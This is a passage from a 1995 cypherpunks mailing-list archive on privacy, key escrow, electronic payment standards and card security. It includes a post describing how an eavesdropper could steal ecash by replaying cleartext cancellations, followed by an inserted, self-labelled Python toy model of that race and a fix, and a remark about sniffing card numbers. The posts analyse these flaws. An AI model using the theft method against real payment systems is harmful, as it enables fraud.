routinely provide the Chinese authorities with bugging equipment
and telephone tapping devices. 

	Privacy International was formed in 1990 as a non-government, non-profit
organisation.  It brings together privacy experts, human rights advocates and
technology experts in more than 40 countries, and works toward the goal of
promoting privacy issues worldwide.  The organisation acts as an impartial
watchdog on surveillance activities by governments and corporations.

For further information or interview, contact Simon
Davies in London at davies@privint.demon.co.uk.  The address of the web
site is  http://www.privacy.org/pi/reports/big_bro/




_________________________________________________________________________
Subject: PRIVACY WATCHDOG OUTS BIG BROTHER...
_________________________________________________________________________
David Banisar (Banisar@privacy.org)     *  202-544-9240 (tel)
Privacy International Washington Office *  202-547-5482 (fax)
666 Pennsylvania Ave, SE, Suite 301     *  HTTP://www.privacy.org/pi/
Washington, DC 20003                   

------------------ RFC822 Header Follows ------------------
Received: by epic.org with SMTP;3 Dec 1995 23:09:13 -0500
Received: from epic.org (washofc.epic.org [204.91.138.50]) by svcs1.digex.net
(8.6.12/8.6.12) with SMTP id XAA27478; Sun, 3 Dec 1995 23:07:51 -0500
Message-ID: <n1394090361.79608@epic.org>
Date: 3 Dec 1995 23:07:03 -0500
From: "Dave Banisar" <banisar@epic.org>
Subject: PRIVACY WATCHDOG OUTS BIG B
To: "pi" <pi@privacy.org>
X-Mailer: Mail*Link SMTP-QM 3.0.2








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Mon, 4 Dec 95 08:10:13 PST
To: cypherpunks@toad.com
Subject: [farber@central.cis.upenn.edu: IP: NSC Announce -- iPower home page/CryptoSampler announcement]
Message-ID: <9512041608.AA26504@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


From a National Semiconductor press release...



     To order  the CryptoSampler package in either configuration, call
1-800-272-9959 Ext# 631 between the hours of 7 AM and 7 PM Central
Standard Time.  To play CryptoSolver and for more information about
the CryptoSampler program, see the iPower web site at
http://www.ipsecure.com  .




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Mon, 4 Dec 95 11:47:53 PST
To: Frank Andrew Stevenson <frank@funcom.no>
Subject: Re: Cracked: WINDOWS.PWL
In-Reply-To: <Pine.SGI.3.91.951204174641.2847A-100000@odin>
Message-ID: <Pine.ULT.3.91.951204113806.16412D-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Very interesting.

Do you have information on the content of the various resource records
within a .PWL file? They should be the stored usernames and passwords for
every other authenticated service used by the "user profile."

I.e. the "default login," say, the local Windows password, encrypts the
.PWL file, and the contents are the passwords used for NetWare, NT,
Dial-Up Networking, the screen saver, .PWL-enabled "security" utilities,
etc.

If anyone wants a sample .PWL file including known values of all of the 
above, I can have it for you within a day. Of course I wouldn't want to 
give you any *real* passwords.

Of course I should just compile your code myself, but it's a busy day, 
and I'd hate to unnecessarily duplicate someone else's work...

- -rich
 moderator of the win95netbugs list
 http://www-leland.stanford.edu/~llurch/win95netbugs/faq.html

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMMNP9Y3DXUbM57SdAQF+1wP/RFHvnjpne9bGsU6K8xxT3UPav2nt+8wR
2CUnY/Dm32bTDegx7QO8zpUVckNR2YwxG5ivZhBnov8UhMcngWdMLPjkdSCepPXP
cvKTTwAVknmxqLXkyuVSn06PGKlNz5RQnluop5s74IJ3nmJPAFnU+/pGWvlZY3cN
jh42jdlo/8s=
=zDbs
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp" <ecarp@netcom.com>
Date: Mon, 4 Dec 95 12:04:36 PST
To: John Young <cypherpunks@toad.com
Subject: Re: SEN_sor
Message-ID: <199512041905.NAA02443@khijol>
MIME-Version: 1.0
Content-Type: text/plain


> From:          John Young <jya@pipeline.com>
> Date:          Mon, 4 Dec 1995 07:50:16 -0500
> To:            cypherpunks@toad.com
> Subject:       SEN_sor 

>    12-4-95. NYPeeper:

>    "Nearing the $500 Computer for Internet Use."
> 
>       Acorn is about to introduce a stripped-down machine for
>       Net surfing that sells for about $900. By stripping it
>       of its monitor and hard disk drive, and adding a
>       high-speed modem, Acorn executives say they can hit a
>       retail price less than $500. They plan to ship the
>       Netsurfer by early next year, and are discussing
>       licensing with Oracle and a number of American and Asian
>       companies.

Oh, hell, even I can do *that*.  Let's see ... motherboard, $100.  
Floppy drive and controller, $50.  14.4KB modem, $50.  Case and power 
supply, another $50 or so.  $250 profit.

What's so tough about that?  Not a bad deal for Acorn, if you ask me. 
 Hell, maybe I'll go into business making the damned things for that 
kind of profit margin...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Mon, 4 Dec 95 12:14:04 PST
To: rsalz@osf.org (Rich Salz)
Subject: Re: Meeting notes from ANSI X.9 Meeting on Electronic Payment
In-Reply-To: <9512041705.AA25255@sulphur.osf.org>
Message-ID: <199512042005.MAA04678@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	It doesn't appear that these people seem to care about
cash-like anonymous token-based payment schemes. Is that a valid
assessment? What is needed to make these people start caring about
that?

> 
> ---------- Begin Forwarded Message ----------
> Date: Fri, 1 Dec 1995 22:43:46 -0500 (EST)
> From: "Debbie O'Dell" <dlo@dsunix2.dsrd.ornl.gov>
> To: Electronic Commerce Working Group Reflector <fstc-ecomm@monroe.llnl.gov>
> Subject: Meeting notes from ANSI X.9 Meeting on Electronic Payment Standard

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Mon, 4 Dec 95 09:07:51 PST
To: cypherpunks@toad.com
Subject: Re: Meeting notes from ANSI X.9 Meeting on Electronic Payment Standard
Message-ID: <9512041705.AA25255@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


---------- Begin Forwarded Message ----------
Date: Fri, 1 Dec 1995 22:43:46 -0500 (EST)
From: "Debbie O'Dell" <dlo@dsunix2.dsrd.ornl.gov>
To: Electronic Commerce Working Group Reflector <fstc-ecomm@monroe.llnl.gov>
Subject: Meeting notes from ANSI X.9 Meeting on Electronic Payment Standard

ABA Meeting of the X.9 ANSI Meeting 11/29/95, on Electronic Payments:
Cindy Katzen (?) gave an introduction.  She said that the ANSI X.9 which is
accredited to develop financial industry standards, has approved this work
item on Electronic Payments.  X.9 has 6 subcommittees, 30 active working
groups, and manage 70 standards, and technical specifications.  We do 5 year
reviews on each.  Also they are the US technical advisory group to ISO
Technical Committee 68 (TC68), and they also provide a secretariat.  TC68
has 3 subcommittees.  Mark Zalewski of Cybercash is nominated chair for TC68.

This is domestic standards development.  Define work and tell them what
needs to be done.  If there does not need to be a domestic standard but an
international one that is okay.  Intel has offered to provide a Chairperson,
Tom Jones.

Tom led the meeting with the following agenda:
Scope of work item
Proposal to extend the work item into other areas
2 presentations on other standards, Taher Elgamal on SEPP, and FSTC on Echeck

The general purpose of this work item is to produce an American national
standard on secure electronic payment syntax.  Since the group is large, Tom
suggested nominating a small editing group of 6-10 people to put together a
document and bring it back to the larger group.

Tom said that he wanted to get through the work item in 18 months, and to do
that there would have to be a draft in 9 months.  The following document was
a strawman distributed to start discussion on a proposed X9 new work item.

"Towards an American National Standard:  Secure Payment Syntax
Scope:
The payment syntax described in this standard is designed to order a
Financial Institution to make a payment to a merchant from an account of a
purchaser based on the near term delivery of low monetary  value goods or
services.  It should be possible to include this payment order in any
electronic protocol that is based on communications between the purchaser
and the merchant, and between the merchant and a Financial Institution.
This standard does not describe, nor recommend, any particular communication
protocol.

When used within a complete payment infrastructure, the secure payment order
described below shall offer privacy and integrity of the purchaser's payment
information, and shall prevent the purchaser from successfully repudiating
the sending, or the merchant from successfully repudiating the receiving, of
a valid payment order.  Non-repudiation of receipt will require secure
acknowledgment messages.  Thus the Financial Institution can be sure that
its customer requested the payment and that the merchant can be accurately
identified on the account statement.

Purpose:
Consumers, operating from within their own home or business, have access to
an increasingly wide range of electronic displays of merchant's wares.  The
source of this electronic cornucopia can be provided by networked
connections, broadcast or narrowcast TV, the physical distribution of
electronic media, such as CD-ROM, or future media connections which are now
only in the conceptual stage.  Regardless of the source of the information,
there is an increasingly urgent demand that users make the purchase
decision directly from the electronic media, and the purchase decision be
transmitted together with payment information to the merchant.  The merchant
wants to receive the payment information prior to delivering the merchandise
to cut down on fraud loss and the purchaser seems to want immediate access
to the goods or services, purchased.

This standard is intended to close the electronic loop by providing a secure
means for the purchaser to make payment information available to the
merchant, without revealing any secret information that could be used in a
fraudulent manner to access the purchaser's accounts.  The payment
information will only be accessible by the purchaser, and the purchaser's
Financial Institution, but the merchant can be assured, in real-time, that
payment will be honored by his Financial Institution.

Content of the Payment Order:
The fields required for the payment order are separated into the plain text
segment and enciphered segment.

Transparent fields from CyberCash Credit Card Protocol (CH1)
  type: card-payment
  id
  order-id
  merchant-ccid
  transaction
  date
  pr-hash
  pr-signed-hash
  cyberkey

EPO fields from "NetBill Security and Transaction Protocol"
  purchaser's ID
  Product ID
  Negotiated Price
  Merchant ID
  Crypto Checksum of Product Request Data
  Crypto Checksum of Purchaser's Account No with a nonce
  Globally-unique EPOID (Transaction ID)

Security for the Payment Order (from the Purchaser)
Only those fields that are in the enciphered segment will be protected from
disclosure or alteration by cryptographic means.

Opaque fields from CyberCash Credit Card Protocol (CH1)
  swversion
  amount&currency
  card (expiry, number, type, salt) - must be pre-approved
  signature

EPO fields from "NetBill Security and Transaction Protocol"
  Ticket proving the customer's TRUE ID
  Authorization Tokens
  Purchaser's Account No
  nonce
  Purchaser's memo field

Security for Merchant Fields
Those fields that are in the merchant's enciphered segment will be protected
from disclosure or alteration by cryptographic means.

Merchant Opaque fields from CyberCash Credit Card Protocol (CM1/2)
  type
  order-id
  merchant-amount&currency
  pr-hash
  pr-signed-hash
  id
  transaction
  date
  merchant-signature

EPO fields from "NetBill Security and Transaction Protocol" added by merchant
  Merchant's account number
  Merchant's memo field
  Goods decryption key
  Merchant signature
"

Discussion on scope:

The result of this group will be a message set and sequence diagram.  There
will be a lot of work going into what is in those messages.

There was some discussion about the use of the terms low monetary value and
merchant.

Graham asked if other payment flows would be considered.  Tom said that he
wanted to have a scope that is small and easily achievable, so that is why
we are focusing the flow from consumer to merchant to financial institution.

Right now this cannot support cash, as it requires the consumer to have a
bank account.  It can support credit or debit.

There are a relatively small group of encryption algorithms about to be
approved by X-9.

Three have been approved:   DES,  Triple DES is in the works, RSA and
Vhelman (?).  Digital Signature and Secure Hash is a standard; attribute
lists are being worked on.  Security folks in X9f will be active in this
work item.

It may be necessary to specify encryption schemes.  Key exchange is quite
different.  If you allow more than one, you get into interoperability
problems.

NSA representative said that the length of the encryption key should not be
an issue, but what is encrypted should be of more concern for the group.
The group should not limit this standard based on a regulation that could
change in a few months.

The 820 is complicated and could be used to accomplish this activity, but
this work item is trying to come up with a relatively simple consumer
oriented transaction.

If you are going to say privacy, integrity and non-repudiation, then you
will have to define cryptography.  X.9 has standards that define the
cryptography protocols so we can reference them.

The comments on the scope will be incorporated and a new draft will be
submitted to the group for review.

Will the usage specification operate with current regulation and clearing
and settlement system?

If you use Party A, Party B and a Bank, instead of using the term merchant,
then you could move it in any way.  If there are 2 parties and only one
bank, then this will not affect any clearing system.  If it is 2 parties and
2 banks then the clearing system comes into play.

Should the second bank be added to the scope?  Do we want to support flows
between financial institutions?

We need to rely on the banks to tell us if this is  implementable.  Dan
suggested that the standard be expanded to support information exchanged
between banks.

Tom said that we should work to understand the needs of customers and limit
ourselves to the problems that we know and not try and solve problems we
don't know about.

We can produce guidelines for reference implementations, but they are not
part of the standard.  We encourage organizations that are developing
implementations to advise us of any issues in implementing the standard.

Tom said that he will do his best to narrow the scope.  If any suggestion
increases the scope significantly, I will recommend that they become a
separate work item.

Talk on SEPP:  John Gould of MasterCard said that the Secure Electronic
Payment Protocol (SEPP) is intended to solve MC's business model.  We expect
to conclude revision to the SEPP review process in less than 60 days.  We
have a time pressure by customers and member banks to secure our brand
products quickly.  We will be piloting the result hopefully with VISA and
X9.  Take the SEPP document as an informational, living, document.  We will
not know how good it is until we start to pilot it.

Taher Elgamal, of Netscape, said that SEPP is a vertical solution rather
than a horizontal message format.  SEPP solves the credit card transaction
where there is a consumer, merchant and merchant's bank.  We were not trying
to solve the world's payment problems.  Credit cards are the simplest model
to use.  People feel comfortable because the liability is to the benefit of
the consumer most of the time.  We tried to minimize the impact on the
existing medium, banking protocols and networks.  The design is a front end
to the existing bank network.

We had to solve the authentication problem.  It is not really exactly known
how this will work and if it will scale properly.  We tried not to change
relationship between parties.  We started with a generic philosophy to use
standards where they exist.

SEPP will be implemented independently by different vendors that have to
achieve interoperability.  The merchant does not have to see the credit card
number even though he does today.  The payment/order has dual encryption.
The payment instruction is opaque to the merchant.  The order details are
not of interest to the bank.

The message formats are the tools in SEPP, to achieve the product, that is
useful.  There is an attempt to solve the grand picture.  The credit card
system is complex.

Does the merchant really need to know the identity of the consumer?  The
merchant is only interested that the person is capable of using the amount.
They may want to know, but they may not need to know.

We built in an online certification system, which certifies consumers and
merchants.   For SEPP, the acquiring bank does the certification.  Dan
mentioned that this is not quite analogous to how it works in the paper model.

Frank Jaffe spoke about Echeck.
He said that the future is likely to bring more alternatives, not less.  We
wanted to move the check to a paperless instrument.  Eliminate paper and use
cryptographic methods to secure it.  We're looking at digital signatures to
replace hand signatures.
The Electronic Check supports multiple check flows.  Deposit and Clear
(Normal) flow, Cash Check, Z flow, Lockbox flow, and transfer flow.
Electronic Check supports multiple business models:  Certified Check flow,
Interchange, Third Party Payer.
Overview:
-Develop a secure, all-electronic instrument modeled on paper check
primarily for use in electronic commerce
-Enable this instrument to be flexible and represent other physical
instruments such as cashier's checks, traveler's checks
-Develop a general programmatic set of tools and standard interfaces,
protocols and formats so that E-Check functions can be used for other
applications.
-Test approach through a commercial pilot.

We would like to develop a reference implementation and tools to make it
easier to use it.

Electronic Check objectives:
-provide individuals and businesses a safe convenient debit payment option
-use inexpensive public networks
-enable merchants to automate complete transactions

 We're not trying to specify encryption, to allow parties to use what they
want.

Key component summary:
-hardware token for electronic and checkbook cryptographic key storage
-digital signatures for transaction authentication
-electronic certificates for account and bank authentication
-secure hash for tamper-proofing
-encryption for privacy is optional
-remittance/invoice/order form included for automated accounts receivable
processes
-public networks for transmission

The scope of the project is to issue payment orders against accounts in banks.
If customer wants it, banks can afford it, and it can be done securely then
why not?

Tom started discussion again on the X.9 Work item.  He said that we need to
address: what do customers want, what risks do banks want to take and how
fast do you want to do it?

The banking industry needs a protocol standard for electronic  payments.
This could be the beginning of something bigger; define a scope for this
work item, but as the beginning of a payment protocol.

Frank suggested that the project should focus more than just consumer to
merchant.

Several people suggested trying to develop a more encompassing payment
protocol than just consumer to merchant payments, because it is easier to
design up front than redesign after it has been implemented.

Others suggested that we ought to start with something manageable, like
debit or credit cards, but not design ourselves into a corner.

If this group does not address payment types, then client software will have
to identify between payment types and what merchants and/or banks take what.

Taher pointed out that SEPP will not do debit cards well.

Will consumers use account based systems in the volume that you expect?

Many agreed that speed is important, and encouraged staying focused for time
considerations.

There was a suggestion to have separate groups developing payment syntax for
credit, debit, echeck.

One suggestion was to help the consumer to quickly negotiate a payment
system of choice.

Spending time on credit seems to make sense since it is more widely used on
the Internet.

NACHA is addressing the check issue.

Tom summarized the discussion saying that it appeared that most agreed to
stay cognizant of all issues, but focus on the credit model and allow the
architecture to expand.

We should find what is in common to all payment systems.  Make it modular to
add on types or variations.
Someone suggested a steering committee to address these extensions.

Tom proposed an editing group of 6-10 people to get document out on the
credit model.  He proposed having a meeting of the editing group on January
16th in San Francisco.

The full group will meet Feb. 29th at Cylink in Sunnyvale,
and tentatively June 7th in Boston at the Fed.

However other groups would like to deal with the other issues is up to them.

FSTC will find a way to work with this committee through their joint
membership.

Tom asked Frank to feed back to X9 how FSTC wants to fit Echeck into this
work group.

All this work item was written to deal with is the syntax, we are not going
to deal with the protocol.   There would be a multiplicity of protocols that
would use it, phone, modem, http.

SEPP has an application protocol that is independent of communications.

Mohammad Khan volunteered to lead a group to discuss management issues
including negotiation.  VISA, MC, Discover, IBM, and Cybercash volunteered
to participate in that group.
----------- End Forwarded Message -----------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 4 Dec 95 09:05:20 PST
To: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Subject: Re: No Privacy Right in the Americas ?
In-Reply-To: <Pine.BSD.3.91.951204003918.13763D-100000@ahcbsd1.ovnet.com>
Message-ID: <199512041705.MAA07611@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"James M. Cobb" writes:
> Friend, 
>  

Enemy,

Please stop this neverending stream of oddly formatted and irrelevant
messages...

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Mon, 4 Dec 95 10:10:48 PST
To: Hal <hfinney@shell.portal.com>
Subject: Re: towards a theory of reputation
In-Reply-To: <199512022116.NAA11199@jobe.shell.portal.com>
Message-ID: <199512041809.NAA24040@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Hal writes:
>Changing the market conventions (say, by introducing escrow agencies)
>will change the weightings of the various factors that make up
>utility.  If I no longer have to trust the honesty of the person I am
>trading with (because we have an escrow agency to help us make the
>exchange) then the importance of his reputation for honesty goes down.
>The result is that the "reputation" curves will change rather
>dynamically and unpredictably as we consider different possible
>structures in the market.  This will make the analysis of them
>intractable, I would think.

Analytically, using an escrow agent doesn't change the utility
function.  It replaces the trading partner's honesty reputation
estimate with the escrow agent's (which is presumably higher, or why
use them?).  This is just a parameter substitution.

Whence comes the intractability?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Koning               1695 <pkoning@chipcom.com>
Date: Mon, 4 Dec 95 09:14:57 PST
To: Cypherpunks mailing list <cypherpunks@toad.com>
Subject: RE: key escrow compromise
Message-ID: <30C3575F@mailer2>
MIME-Version: 1.0
Content-Type: text/plain



Quoting: "Vladimir Z. Nuri" <vznuri@netcom.com>
>I tend to agree with Clark in only one regard: the government is going
>to get into the key storage/retrieval business in some form or another
>eventually & inevitably; it's just not stoppable.

Well, I would tend to disagree.  If PGP weren't out, you might conceivably
have a point.  Given that it is out, are you suggesting that the NSA would
be able to make all copies of it go away?  And all copies of PEM?
And everyone else's encrypted Email programs including all those
available from many other countries?  Shutting down the Internet
completely wouldn't be a sufficient measure to make that happen.

>the aspect
>that is up for grabs is whether these systems will be *mandatory* for
>all private communication.

I remember some clear statements that this is the goal, as should be
obvious, since any smaller goal doesn't make any sense.

>here's a quick idea. the post office is getting into
>certification authorization come hell or high water (ETA summer, 96).
>now, frankly I think this is a good thing. someday we will need some kind
>of legal agency to deal with citizen keys, so that we could have
>cryptographic dealings with federal agencies such as the motor
>vehicles department, etc.

Well, I don't know why a government agency that calls itself a
non-government agency one minute and hides underneath special government
monopoly privileges should be given yet another special
privilege, but anyway... yes, clearly at some point we will need
certification that will make digital signatures useable.

However, that has NO connection with GAK, and in fact is a strong
argument against it.  If the government has access to my keys, then
why should anyone trust my signature?  Conversely, certification
for digital signatures involves making statements about the validity
of PUBLIC keys, and imposes NO requirement on private keys.

     paul




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Mon, 4 Dec 95 10:22:34 PST
To: OpsAn@gnn.com (Michael Coates)
Subject: Re: INTERNET SECURITY RISKS FOR CONSUMERS OVERBLOWN
Message-ID: <9512041821.AA00569@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


>  "If someone wanted to steal a credit card number, all they would
>  have to do is go to any gas station and look on the ground around
>  the pumps," says the CTO at Internet security firm Terisa Systems.

Sure, if you wanted to steal a card number or two the ground around a  
gas-station would probably be a good choice.  However, if you wanted to steal  
a thousand card numbers (or maybe even thirty thousand), just sniff packets  
off a hub near a large Web site that accepts unencrypted (or weakly  
encrypted) card transactions or hack your favorite ISP's machines.

It really bothers me that officers at companies writing net commerce software  
are regularly quoted in the trade rags comparing the relatively little risk  
of a single net card transaction vs. a transaction at a restaurant or gas
station.  We aren't talking about a crooked clerk who handles at most a few  
hundred cards per day or an unlocked dumpster with maybe the same number of  
carbons in it.  We are talking about potentially hundreds of thousands of  
card numbers whizzing through a single point that could be easily (and  
undetectably) monitored and recorded with off-the-shelf-equipment for later  
analysis.  Even if the transactions are encrypted, a single exploitable  
weakness discovered after widespread deployment could compromise massive  
numbers of cards.  The stakes are much higher and this will invite much more  
sophisticated crooks to attempt to defraud the system.


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pete Loshin <pete@loshin.com>
Date: Mon, 4 Dec 95 10:20:45 PST
To: "'cypherpunks@toad.com>
Subject: RE: GAK_hit
Message-ID: <01BAC24B.759D78A0@ploshin.tiac.net>
MIME-Version: 1.0
Content-Type: text/plain


James Donald wrote:

>At 09:25 AM 12/4/95 -0500, John Young wrote:
>>   12-4-95. W$Jabber:
>>
>>   "Microsoft Probe Spurs Subpoenas Tied to Internet.
>>   Antitrust Effort Appears Focused on Windows 95 Disabled
>>   Rival Software."
>
>>      The subpoena issued to Netscape may be of particular
>>      significance. In the estimate of Netscape and industry
>>      observers,
>
>I regularly use netscape on windows 95, and I conclude that 
>this subpoena is pure, 100% harassment.

What does that mean? I interpret it to mean only
that Netscape is being asked to testify _against_
MS. I've been using Win95 along with at least half
a dozen different browsers (including about the same
number of different Netscape versions), and never 
had any compatibility problems switching.

Most recently I was running IBM Explorer 2.0 until the
other day when I "upgraded" to the latest beta of
Navigator--at which point Explorer stopped being
my default browser. Navigator never asked if I wanted
to make it the default, but now all my .htm and .html
files have that Navigator look. As soon as this project
is done, I'm switching back to Explorer, thank you.

-Pete Loshin
 pete@loshin.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: turner@TeleCheck.com
Date: Mon, 4 Dec 95 11:30:15 PST
To: cypherpunks@toad.com
Subject: [POINTER:] Crypto Articles in Dr. Jobbs Journal
Message-ID: <9512041930.AA14103@mercury.telecheck.com>
MIME-Version: 1.0
Content-Type: text/plain



For non Dr. Jobbs subscribers:

Dr. Jobbs Journal has several articles on encryption,
including an article by Ian and Dave on the Netscape crack, multiple 
encryption, and using MD5 for passwords.

Also, there is a very interesting article by the author of Applied
Cryptography (the Big Mac himself), looking at differential and linear
cryptoanalysis of the DES algorithm.

There are also some compression articles as well.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@csclub.uwaterloo.ca (Ian Goldberg)
Date: Mon, 4 Dec 95 11:09:11 PST
To: cypherpunks@toad.com
Subject: How to steal ecash (was: Questions/Comments on ecash protocol)
In-Reply-To: <199512012222.OAA18230@netcom14.netcom.com>
Message-ID: <49vgvh$i7a@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <199512030127.RAA03496@cory.EECS.Berkeley.EDU>,
Ian Goldberg  <iang@cory.EECS.Berkeley.EDU> wrote:
>Since the payer_code is not supposed to be sent around, how is it sent to
>the bank in order to cancel a payment?  The document says "This allows him
>to cancel the payment (deposit in his account)...", which seems to indicate
>that a cancellation is just a deposit (made out to someone else), accompanied
>by an appropriate payer_code.  It is important that an eavesdropper not
>be able to ever see the payer_code that corresponds to a payment, or
>else she could present both to the bank and say "cancel this payment",
>and get the money "back".

After reading the responses to my questions/comments, it seems that, if
Charlie (the customer) wants to cancel a payment, his ecash client sends
a copy of the payment, including the payer_code field (which evidently was
not in the original payment), to the mint.  The mint accepts the payment
because the payer_code was supplied.  However, the payer_code is sent
_in the clear_.

Thus: How to steal ecash:

This method can be used by Mitch, an active eavesdropper, though all he really
needs to be able to do is selectively remove or delay packets in transit.

Mitch taps either his target, or, better yet, the mint, and watches for
deposits to the mint that have the payer_code filled in (a cancelled payment).
He delays that packet, and sends the identical deposit to the mint himself
(with his own userID in the userhdr, of course).  The mint, being unable
to know who withdrew the coin originally, has no reason to believe it wasn't
Mitch, and so happily deposits the money "back" in Mitch's account.
Mitch is then free to release the delay on the original packet, and
Charlie's deposit fails (as the coin has already been deposited).

So:  do I win anything?   :-)

Disclaimer: Don't do this.  Then again, is it illegal to copy ecash?  I doubt
  it's considered counterfeiting.  What about creating ecash out of thin air
  (say I had a magic factoring box (like a quantum computer (well, not yet)))?

   - Ian "IANAL, but IAA security-wise net.citizen..."
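
[Added example, not part of the post above and not DigiCash code: a toy mint showing why a cleartext payer_code acts as a bearer token in the cancellation race described, next to one way to bind a cancellation to an account. The coin layout, the payer_hash field, the Mint class and the commit/reveal flow are all assumptions made for illustration.]

```python
"""Toy model of the cancellation race in the post above (constructed example).

Assumptions, not the real ecash protocol: a coin carries
payer_hash = H(payer_code), and the hardened flow is a generic commit/reveal.
"""
import hashlib
import secrets


def h(*parts: bytes) -> bytes:
    """SHA-256 over length-prefixed fields, so field boundaries cannot shift."""
    d = hashlib.sha256()
    for p in parts:
        d.update(len(p).to_bytes(4, "big") + p)
    return d.digest()


def make_coin(value=5):
    """Return (coin, payer_code); only the payer is supposed to know payer_code."""
    payer_code = secrets.token_bytes(16)
    coin = {"id": secrets.token_hex(8), "value": value,
            "payer_hash": h(payer_code)}
    return coin, payer_code


class Mint:
    def __init__(self):
        self.balances = {}   # user_id -> amount
        self.spent = set()   # coin ids already deposited
        self.commits = {}    # coin id -> [(user_id, commitment)] in arrival order

    def _credit(self, user_id, coin):
        self.spent.add(coin["id"])
        self.balances[user_id] = self.balances.get(user_id, 0) + coin["value"]

    def cancel_bearer(self, user_id, coin, payer_code):
        """Behaviour described in the post: first presenter of payer_code wins."""
        if coin["id"] in self.spent or h(payer_code) != coin["payer_hash"]:
            return False
        self._credit(user_id, coin)
        return True

    def commit(self, user_id, coin_id, commitment):
        """Hardened step 1: register H(payer_code, user_id); reveals nothing usable."""
        self.commits.setdefault(coin_id, []).append((user_id, commitment))

    def reveal(self, coin, payer_code):
        """Hardened step 2: credit the EARLIEST commitment this payer_code opens.

        Who delivers the reveal does not matter, so replaying it gains nothing.
        Returns the credited user_id, or None if nothing was credited.
        """
        if coin["id"] in self.spent or h(payer_code) != coin["payer_hash"]:
            return None
        for user_id, commitment in self.commits.get(coin["id"], []):
            if commitment == h(payer_code, user_id.encode()):
                self._credit(user_id, coin)
                return user_id
        return None


def race_bearer():
    """Cleartext cancel is delayed; an identical copy under another userID lands first."""
    mint = Mint()
    coin, code = make_coin()
    mitch_ok = mint.cancel_bearer("mitch", coin, code)      # replayed copy
    charlie_ok = mint.cancel_bearer("charlie", coin, code)  # delayed original
    return mitch_ok, charlie_ok, mint.balances


def race_commit_reveal():
    """Same network position, but the account was bound before the code was shown."""
    mint = Mint()
    coin, code = make_coin()
    mint.commit("charlie", coin["id"], h(code, b"charlie"))
    # Charlie's reveal is delayed and read in transit; a late commit is all
    # the eavesdropper can add, and it sorts after Charlie's.
    mint.commit("mitch", coin["id"], h(code, b"mitch"))
    first = mint.reveal(coin, code)    # replayed copy arrives first
    second = mint.reveal(coin, code)   # delayed original
    return first, second, mint.balances


if __name__ == "__main__":
    print("bearer payer_code :", race_bearer())
    print("commit then reveal:", race_commit_reveal())
```

The hardened flow only holds if the client waits for an authenticated acknowledgement of its commit before sending the reveal. Encrypting the cancellation to the mint removes the same race without the extra round trip.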




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Mon, 4 Dec 95 12:07:53 PST
To: cypherpunks@toad.com
Subject: Re: key escrow compromise
In-Reply-To: <30C3575F@mailer2>
Message-ID: <199512042009.OAA04796@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


>I tend to agree with Clark in only one regard: the government is going
>to get into the key storage/retrieval business in some form or another
>eventually & inevitably; it's just not stoppable.

I don't understand this attitude at all.

There is no constituency for GAK except for law enforcement.  Everyone 
else hates it.  There isn't any legal or constitutional basis for 
believing that GAK is unstoppable.

The more information people have about GAK the less likely it becomes, 
and more and more people find out about it every day.

Perhaps believing our opponents have unlimited power and influence adds 
to the romance of what we're doing here.  But it's not true.

This is winnable.  



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Mon, 4 Dec 95 12:26:45 PST
To: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Subject: Re: INTERNET SECURITY RISKS FOR CONSUMERS OVERBLOWN
In-Reply-To: <9512041821.AA00569@ch1d157nwk>
Message-ID: <199512042026.PAA03718@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Andrew Loewenstern writes:
>>  "If someone wanted to steal a credit card number, all they would
>>  have to do is go to any gas station and look on the ground around
>>  the pumps," says the CTO at Internet security firm Terisa Systems.
>
>Sure, if you wanted to steal a card number or two the ground around a  
>gas-station would probably be a good choice.  However, if you wanted to steal 
>a thousand card numbers (or maybe even thirty thousand), just sniff packets  
>off a hub near a large Web site that accepts unencrypted (or weakly  
>encrypted) card transactions or hack your favorite ISP's machines.

Duh.  The point of the article the original poster quoted was that
there's little risk to individual *consumers*.  If someone sniffs
thirty thousand credit cards from a poorly secured web-site, the
consumers are still only liable for $50.  Of course, the card company
gets a big bill, and probably will try to sue the site to recover, and
both will pass those costs back to the consumer, assuming they
survive.  The total cost is still pretty small to the individual.




